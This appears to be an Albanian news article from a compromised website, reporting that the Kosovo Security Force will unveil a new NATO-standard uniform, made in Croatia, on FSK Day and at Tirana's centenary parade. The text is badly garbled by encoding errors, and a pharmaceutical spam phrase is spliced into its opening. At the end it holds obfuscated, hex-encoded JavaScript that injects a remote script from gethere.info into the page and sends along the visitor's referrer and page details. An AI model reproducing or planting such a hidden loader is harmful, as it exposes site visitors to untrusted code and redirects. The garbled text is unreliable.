30J_sig_FSK

FSK me uniformA� tA� re

free samples of femara. kForca e SigurisA� sA� KosovA�s, qA� nga e hA�na do tA� paraqitet me uniformA� tA� re, e cila A�shtA� sipas standardeve mA� tA� larta tA� NATO-s por edhe me identitet kombA�tar.

Ministri i FSK-sA�, Agim A�eku ka deklaruar pA�r a�?Radio KosovA�na�? se uniforma do tA� promovohet nA� ditA�n e FSK-sA� dhe nA� kuadA�r tA� aktiviteteve pA�r shA�nimin e 100 vjetorit tA� shpalljes sA� shtetit shqiptar.

PjesA�tarA�t e ForcA�s sA� SigurisA� tA� KosovA�s do tA� duken ndryshe gjatA� manifestimit tA� ditA�s sA� tyre dhe gjatA� festimit tA� 100-vjetorit tA� shtetit shqiptar.

a�?Kemi vendosur ta ndA�rtojmA� forcA�n identifikuese me standarde me te larta tA� NATO-s, por me identitet kombA�tara�?, ka theksuar A�eku.

NdA�rkaq, Komandanti i FSK-sA� Gjeneral Lejtnant Kadri Kastrati ka thA�nA� se FSK-ja do tA� paraqitet me uniformA� te re me 26 nA�ntor, nA� orA�n 10:00, kur fillon rreshtimi pA�r tA� shA�nuar ditA�n e FSK-sA�. Ai ka theksuar se kjo uniformA� A�shtA� qepur nA� Kroaci.

a�?Ne e kemi marrA� njA� vendim dhe me urdhA�r A�shtA� caktuar qA� me 26 nA�ntor tA� gjithA� pjesA�tarA�t e FSK-sA� nA� orA�n 10 ta veshin kur fillon edhe rreshtimi pA�r tA� shA�nuar ditA�n e FSK-sA�. A�shtA� njA� uniforme e bukur qA� vet e kemi dizajnuar dhe A�shtA� qepur nA� RepublikA�n e KroacisA�a�?, ka theksuar Kastrati.

PA�r herA� tA� pare uniforma do tA� vishet mA� 26 nA�ntor nA� kazermA�n a�?Adem Jasharia�? nA� PrishtinA�, ku do tA� shA�nohet Dita e FSK-sA�. Dy ditA� mA� vonA�, pA�rkatA�sisht mA� 28 nA�ntor, pjesA�tarA�t e FSK-sA� do tA� shihen duke parakaluar nA� sheshin e TiranA�s, krahas ForcA�s sA� Armatosur tA� ShqipA�risA�.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}